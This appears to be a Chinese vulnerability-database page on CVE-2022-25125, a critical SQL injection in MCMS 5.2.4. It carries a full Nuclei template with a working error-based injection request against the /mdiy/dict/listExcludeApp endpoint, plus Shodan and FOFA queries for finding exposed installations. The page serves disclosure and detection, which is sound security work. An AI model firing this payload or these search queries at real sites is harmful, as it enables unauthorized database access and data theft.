CVE-2022-25125: MCMS 5.2.4 - SQL Injection

日期: 2025-08-01 | 影响软件: MCMS 5.2.4 | POC: 已公开

漏洞描述

MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2022-25125

info:
  name: MCMS 5.2.4 - SQL Injection
  author: Co5mos
  severity: critical
  description: |
    MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4.
  reference:
    - https://github.com/ming-soft/MCMS/issues/90
    - https://gitee.com/mingSoft/MCMS/issues/I4TGYI
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25125
    cwe-id: CWE-89
    epss-score: 0.87806
    epss-percentile: 0.99434
    cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mingsoft
    product: mcms
    shodan-query:
      - http.favicon.hash:1464851260
      - http.favicon.hash:"1464851260"
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,sqli,mcms,mingsoft,vuln
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"

      - type: word
        part: header
        words:
          - "application/json"
# digest: 490a0046304402201575a2ed48512d08cd0785c9335f79e546ff1669ffb7e82f074fe421f857d5630220434bb36e9718e588f4566f1d026ebe081a2390e696843d527d83ad3e569a2f66:922c64590222798bb761d5b6d8e72950

相关漏洞推荐